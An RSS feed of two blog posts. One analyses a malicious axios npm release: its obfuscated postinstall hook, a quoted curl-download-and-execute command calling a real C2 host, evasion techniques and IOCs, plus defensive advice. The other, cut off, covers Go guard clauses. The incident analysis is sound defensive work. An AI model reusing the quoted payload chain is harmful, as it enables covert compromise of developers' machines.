<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: RoseSecurity</title>
    <description>The latest articles on DEV Community by RoseSecurity (@rosesecurity).</description>
    <link>https://dev.to/rosesecurity</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1076321%2F10e436ef-7f26-4e21-a611-3020fd13caed.png</url>
      <title>DEV Community: RoseSecurity</title>
      <link>https://dev.to/rosesecurity</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/rosesecurity"/>
    <language>en</language>
    <item>
      <title>Welcome to Transitive Dependency Hell</title>
      <dc:creator>RoseSecurity</dc:creator>
      <pubDate>Tue, 31 Mar 2026 21:59:46 +0000</pubDate>
      <link>https://dev.to/rosesecurity/welcome-to-transitive-dependency-hell-1cjn</link>
      <guid>https://dev.to/rosesecurity/welcome-to-transitive-dependency-hell-1cjn</guid>
      <description>&lt;p&gt;At 00:21 UTC on March 31, someone published &lt;code&gt;axios@1.14.1&lt;/code&gt; to npm. Three hours later it was pulled. In between, every &lt;code&gt;npm install&lt;/code&gt; and &lt;code&gt;npx&lt;/code&gt; invocation that resolved &lt;code&gt;axios@latest&lt;/code&gt; executed a backdoor on the installing machine. Axios has roughly 80 million weekly downloads, and here's what that three-hour window looked like from one developer's MacBook.&lt;/p&gt;

&lt;h2&gt;
  
  
  Monday Night
&lt;/h2&gt;

&lt;p&gt;A developer sits down, opens a terminal, and runs a command they've run dozens of times before:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;npx &lt;span class="nt"&gt;--yes&lt;/span&gt; @datadog/datadog-ci &lt;span class="nt"&gt;--help&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A legitimate tool from a legitimate vendor. The &lt;code&gt;--yes&lt;/code&gt; flag skips npm's confirmation prompt. The developer (or Claude) isn't even using the tool yet, just checking its options.&lt;/p&gt;

&lt;p&gt;npm resolves the dependency tree and starts writing packages to disk: &lt;code&gt;dogapi&lt;/code&gt;, &lt;code&gt;escodegen&lt;/code&gt;, &lt;code&gt;esprima&lt;/code&gt;, &lt;code&gt;js-yaml&lt;/code&gt;, &lt;code&gt;fast-xml-parser&lt;/code&gt;, &lt;code&gt;rc&lt;/code&gt;, &lt;code&gt;is-docker&lt;/code&gt;, &lt;code&gt;semver&lt;/code&gt;, &lt;code&gt;uuid&lt;/code&gt;, and &lt;code&gt;axios&lt;/code&gt;. All names you'd recognize, and all packages that individually look fine. But &lt;code&gt;axios&lt;/code&gt; just resolved to &lt;code&gt;1.14.1&lt;/code&gt;, which is not the version that Axios's maintainers published four days earlier. It's the version an attacker published twenty minutes ago.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Hijack
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;axios@1.14.0&lt;/code&gt; was the last legitimate release, published on March 27 through GitHub Actions OIDC provenance. The attacker compromised the npm account of &lt;code&gt;jasonsaayman&lt;/code&gt;, an existing Axios maintainer, and changed the account email from &lt;code&gt;jasonsaayman@gmail.com&lt;/code&gt; to &lt;code&gt;ifstap@proton.me&lt;/code&gt;. With publish access, they pushed two malicious versions in quick succession:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;00:21:58 UTC&lt;/strong&gt;: &lt;code&gt;axios@1.14.1&lt;/code&gt;, tagged &lt;code&gt;latest&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;01:00:57 UTC&lt;/strong&gt;: &lt;code&gt;axios@0.30.4&lt;/code&gt;, tagged &lt;code&gt;legacy&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The &lt;code&gt;latest&lt;/code&gt; tag meant every unversioned &lt;code&gt;axios&lt;/code&gt; install worldwide pulled the backdoor. The &lt;code&gt;legacy&lt;/code&gt; tag caught anyone pinned to the 0.x line. Both versions added a single new dependency: &lt;code&gt;plain-crypto-js&lt;/code&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Postinstall Chain
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;plain-crypto-js&lt;/code&gt; declared &lt;code&gt;postinstall: node setup.js&lt;/code&gt; in its &lt;code&gt;package.json&lt;/code&gt;, and npm ran it automatically. The script used two layers of obfuscation (string reversal with base64 decoding, then an XOR cipher keyed with &lt;code&gt;OrDeR_7077&lt;/code&gt;) to hide its real behavior from anyone grepping for suspicious strings. Once decoded, it branched by platform.&lt;/p&gt;

&lt;p&gt;On the developer's Mac, CrowdStrike's process tree captured the full chain. &lt;code&gt;npx&lt;/code&gt; spawned &lt;code&gt;node setup.js&lt;/code&gt;, which shelled out to &lt;code&gt;/bin/sh&lt;/code&gt; to launch &lt;code&gt;osascript&lt;/code&gt; against a script dropped into the per-user temp directory:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;nohup &lt;/span&gt;osascript /var/folders/gz/s87fs56d0pqbr1s7l1b898h80000gn/T/6202033
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;osascript&lt;/code&gt; is Apple's AppleScript interpreter, a legitimate Apple-signed binary present on every Mac. Running code through it instead of directly lets the attacker hide behind a trusted process name. The &lt;code&gt;nohup&lt;/code&gt; ensures the process survives if the parent terminal closes, and the AppleScript then executed the real payload:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;sh &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s1"&gt;'curl -o /Library/Caches/com.apple.act.mond \
            -d packages.npm.org/product0 \
            -s http://sfrclak.com:8000/6202033 \
       &amp;amp;&amp;amp; chmod 770 /Library/Caches/com.apple.act.mond \
       &amp;amp;&amp;amp; /bin/zsh -c "/Library/Caches/com.apple.act.mond http://sfrclak.com:8000/6202033 &amp;amp;"'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &amp;amp;&amp;gt; /dev/null
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Download, set executable, and launch the beacon, all in a single &lt;code&gt;sh -c&lt;/code&gt; invocation. If any step fails, the chain stops. If it succeeds, the malware is already running before the AppleScript exits.&lt;/p&gt;

&lt;p&gt;The output path masquerades as an Apple system daemon using the &lt;code&gt;com.apple.*&lt;/code&gt; reverse-DNS convention. The &lt;code&gt;-d packages.npm.org/product0&lt;/code&gt; is not a real npm URL but a tracking identifier sent as POST data so the C2 knows which package triggered the install. The &lt;code&gt;-s&lt;/code&gt; flag keeps curl silent, and the outer &lt;code&gt;&amp;amp;&amp;gt; /dev/null&lt;/code&gt; swallows any output from the entire chain.&lt;/p&gt;

&lt;p&gt;The binary immediately began beaconing to &lt;code&gt;142.11.206.73:8000&lt;/code&gt; (&lt;code&gt;sfrclak.com&lt;/code&gt;) over HTTP. Ten hours later, CrowdStrike's telemetry shows &lt;code&gt;com.apple.act.mond&lt;/code&gt; still running and reading &lt;code&gt;/Library/Preferences/com.apple.networkd.plist&lt;/code&gt; for network interface configurations, proxy settings, and VPN connection details. The kind of reconnaissance you do when you're deciding whether a machine is worth keeping access to.&lt;/p&gt;

&lt;p&gt;Meanwhile, back in &lt;code&gt;node_modules&lt;/code&gt;, &lt;code&gt;setup.js&lt;/code&gt; was cleaning up after itself. It deleted its own file with &lt;code&gt;fs.unlink(__filename)&lt;/code&gt; and renamed a clean &lt;code&gt;package.md&lt;/code&gt; to &lt;code&gt;package.json&lt;/code&gt;, overwriting the version that declared the postinstall hook. Anyone investigating the installed package later would find no trace of the trigger.&lt;/p&gt;

&lt;h2&gt;
  
  
  Not Just Macs
&lt;/h2&gt;

&lt;p&gt;The same &lt;code&gt;setup.js&lt;/code&gt; had branches for every major platform:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Platform&lt;/th&gt;
&lt;th&gt;Payload Path&lt;/th&gt;
&lt;th&gt;Technique&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;macOS&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/Library/Caches/com.apple.act.mond&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;AppleScript, curl, binary masquerading as Apple daemon&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windows&lt;/td&gt;
&lt;td&gt;&lt;code&gt;%PROGRAMDATA%\wt.exe&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;PowerShell copied and renamed to look like Windows Terminal; VBScript loader drops &lt;code&gt;.ps1&lt;/code&gt; payload with &lt;code&gt;-w hidden -ep bypass&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Linux&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/tmp/ld.py&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Python script downloaded and backgrounded with &lt;code&gt;nohup python3&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;All three phoned home to the same C2: &lt;code&gt;sfrclak.com:8000/6202033&lt;/code&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  What CrowdStrike Caught (and Didn't)
&lt;/h2&gt;

&lt;p&gt;Falcon flagged the macOS beacon as &lt;code&gt;MacOSApplicationLayerProtocol&lt;/code&gt;, mapping to &lt;a href="https://attack.mitre.org/techniques/T1071/" rel="noopener noreferrer"&gt;T1071&lt;/a&gt; (Application Layer Protocol) under &lt;a href="https://attack.mitre.org/tactics/TA0011/" rel="noopener noreferrer"&gt;TA0011&lt;/a&gt; (Command and Control). The detection triggered on the last step in the chain: a binary at a suspicious path making outbound HTTP requests on a non-standard port.&lt;/p&gt;

&lt;p&gt;Everything before that ran unimpeded. The &lt;code&gt;node setup.js&lt;/code&gt; postinstall hook, the &lt;code&gt;osascript&lt;/code&gt; execution from a temp directory, the &lt;code&gt;curl&lt;/code&gt; download and &lt;code&gt;chmod&lt;/code&gt; all completed before any security tooling intervened. If the attacker had used HTTPS on port 443 to a less suspicious-looking domain, the beacon might not have triggered either.&lt;/p&gt;

&lt;h2&gt;
  
  
  IOCs
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Indicator&lt;/th&gt;
&lt;th&gt;Type&lt;/th&gt;
&lt;th&gt;Value&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;C2 Domain&lt;/td&gt;
&lt;td&gt;Domain&lt;/td&gt;
&lt;td&gt;&lt;code&gt;sfrclak.com&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;C2 IP&lt;/td&gt;
&lt;td&gt;IPv4&lt;/td&gt;
&lt;td&gt;&lt;code&gt;142.11.206.73&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;C2 Port&lt;/td&gt;
&lt;td&gt;Port&lt;/td&gt;
&lt;td&gt;&lt;code&gt;8000&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Campaign ID&lt;/td&gt;
&lt;td&gt;String&lt;/td&gt;
&lt;td&gt;&lt;code&gt;6202033&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;macOS Payload&lt;/td&gt;
&lt;td&gt;File&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/Library/Caches/com.apple.act.mond&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;macOS Hash&lt;/td&gt;
&lt;td&gt;SHA256&lt;/td&gt;
&lt;td&gt;&lt;code&gt;92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windows Payload&lt;/td&gt;
&lt;td&gt;File&lt;/td&gt;
&lt;td&gt;&lt;code&gt;%PROGRAMDATA%\wt.exe&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Linux Payload&lt;/td&gt;
&lt;td&gt;File&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/tmp/ld.py&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Tracking ID&lt;/td&gt;
&lt;td&gt;String&lt;/td&gt;
&lt;td&gt;&lt;code&gt;packages.npm.org/product0&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Compromised Packages&lt;/td&gt;
&lt;td&gt;npm&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;axios@1.14.1&lt;/code&gt;, &lt;code&gt;axios@0.30.4&lt;/code&gt;, &lt;code&gt;plain-crypto-js@4.2.0-4.2.1&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hijacked Account&lt;/td&gt;
&lt;td&gt;npm&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;jasonsaayman&lt;/code&gt; (email changed to &lt;code&gt;ifstap@proton.me&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;XOR Key&lt;/td&gt;
&lt;td&gt;String&lt;/td&gt;
&lt;td&gt;&lt;code&gt;OrDeR_7077&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  Takeaways
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Check your lockfiles now.&lt;/strong&gt; Search &lt;code&gt;package-lock.json&lt;/code&gt;, &lt;code&gt;yarn.lock&lt;/code&gt;, and &lt;code&gt;pnpm-lock.yaml&lt;/code&gt; for &lt;code&gt;axios@1.14.1&lt;/code&gt;, &lt;code&gt;axios@0.30.4&lt;/code&gt;, or any reference to &lt;code&gt;plain-crypto-js&lt;/code&gt;. If you find them, assume the installing machine is compromised.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Disable postinstall scripts.&lt;/strong&gt; Add &lt;code&gt;ignore-scripts=true&lt;/code&gt; to &lt;code&gt;~/.npmrc&lt;/code&gt;. When a package legitimately needs a postinstall hook for native compilation, run &lt;code&gt;npm rebuild &amp;lt;package&amp;gt;&lt;/code&gt; explicitly after reviewing the script. This single setting would have stopped the entire attack chain.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Monitor for &lt;code&gt;osascript&lt;/code&gt; spawned by &lt;code&gt;node&lt;/code&gt;.&lt;/strong&gt; There is no legitimate reason for a Node.js process to execute AppleScript from a temp directory. If your endpoint detection sees that process ancestry, kill it.&lt;/p&gt;

&lt;p&gt;The developer did nothing wrong. They ran a standard tool from a major vendor and trusted npm to deliver safe code. The problem is that npm's default behavior (resolve the full tree, install everything, run every postinstall script, no questions asked) turns every &lt;code&gt;npm install&lt;/code&gt; into an implicit trust decision across hundreds of packages maintained by people you've never met. The Axios maintainer account was compromised for three hours. That was enough.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This is the third post in a series on software supply chain attacks. The previous posts covered the &lt;a href="//{{%20site.baseurl%20}}/2026/03/20/typosquatting-trivy"&gt;Trivy ecosystem compromise&lt;/a&gt; and &lt;a href="//{{%20site.baseurl%20}}/2026/03/24/sha-pinning-is-not-enough"&gt;the limits of SHA pinning&lt;/a&gt;. Joe Desimone's &lt;a href="https://gist.github.com/joe-desimone/36061dabd2bc2513705e0d083a9673e7" rel="noopener noreferrer"&gt;technical analysis&lt;/a&gt; of the axios compromise is worth reading in full.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;If you liked (or hated) this blog, feel free to check out my &lt;a href="https://github.com/RoseSecurity" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;!&lt;/p&gt;

</description>
      <category>javascript</category>
      <category>npm</category>
      <category>security</category>
    </item>
    <item>
      <title>The Roadhouse Pattern</title>
      <dc:creator>RoseSecurity</dc:creator>
      <pubDate>Mon, 09 Feb 2026 21:18:27 +0000</pubDate>
      <link>https://dev.to/rosesecurity/the-roadhouse-pattern-2f4o</link>
      <guid>https://dev.to/rosesecurity/the-roadhouse-pattern-2f4o</guid>
      <description>&lt;p&gt;Imagine that Patrick Swayze is writing an SDK. He's haunted by memories of ripping out a man's throat for a &lt;code&gt;nil&lt;/code&gt; pointer deference. To recoop, he sits down in his home office and begins writing a function to issue a new HTTP request to the API, applying authentication and common headers. Before he even writes the &lt;code&gt;NewRequest&lt;/code&gt; logic, he introduces the Roadhouse pattern. The idea is that he wants to fail fast before any work begins, return specific sentinel errors so he knows where it all went wrong, and declare invariants where the guard clauses ARE the documentation for what to accept. Take a look at this function:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="c"&gt;// newRequest creates an *http.Request, applying authentication and common&lt;/span&gt;
&lt;span class="c"&gt;// headers. The path should already include the API version prefix (e.g.&lt;/span&gt;
&lt;span class="c"&gt;// "/v1/devices").&lt;/span&gt;
&lt;span class="k"&gt;func&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;c&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;Client&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;newRequest&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Context&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;method&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;path&lt;/span&gt; &lt;span class="kt"&gt;string&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;body&lt;/span&gt; &lt;span class="n"&gt;io&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Reader&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;http&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Request&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;error&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;validateRequest&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;method&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;validateClient&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;req&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;http&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;NewRequestWithContext&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;method&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;apiURL&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;body&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="o"&gt;...&lt;/span&gt;

&lt;span class="c"&gt;// validateClient checks that the Client is in a usable state.&lt;/span&gt;
&lt;span class="k"&gt;func&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;c&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;Client&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;validateClient&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="kt"&gt;error&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;apiKey&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s"&gt;""&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ErrNoAPIKey&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;apiURL&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s"&gt;""&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ErrNoAPIURL&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;httpClient&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ErrNoHTTPClient&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c"&gt;// validateRequest checks that the request parameters are valid.&lt;/span&gt;
&lt;span class="k"&gt;func&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;c&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;Client&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;validateRequest&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Context&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;method&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;path&lt;/span&gt; &lt;span class="kt"&gt;string&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="kt"&gt;error&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ErrNilContext&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Err&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;method&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s"&gt;""&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ErrEmptyMethod&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;path&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s"&gt;""&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ErrEmptyPath&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  "I Want You to Be Nice Until It's Time to Not Be Nice"
&lt;/h2&gt;

&lt;p&gt;Dalton had three rules for his bouncers at the Double Deuce. The Roadhouse pattern has three for your functions:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Fail Fast, Fail at the Door&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Every bad input that slips past your guard clauses is a drunk patron who made it to the bar. Now you've got a &lt;code&gt;nil&lt;/code&gt; pointer stumbling around your business logic, starting fights and breaking chairs. By the time it panics, you're three stack frames deep and the error message is useless.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Sentinel Errors Tell You Who Started the Fight&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;When something goes wrong at 3 AM in production, you don't want a generic "request failed" error. You want to know exactly which precondition was violated. Was it &lt;code&gt;ErrNoAPIKey&lt;/code&gt;? &lt;code&gt;ErrEmptyPath&lt;/code&gt;? &lt;code&gt;ErrNilContext&lt;/code&gt;?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Guard Clauses Are the Dress Code&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Notice how the &lt;code&gt;validateRequest&lt;/code&gt; and &lt;code&gt;validateClient&lt;/code&gt; functions read like a checklist of requirements:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Context must not be nil&lt;/li&gt;
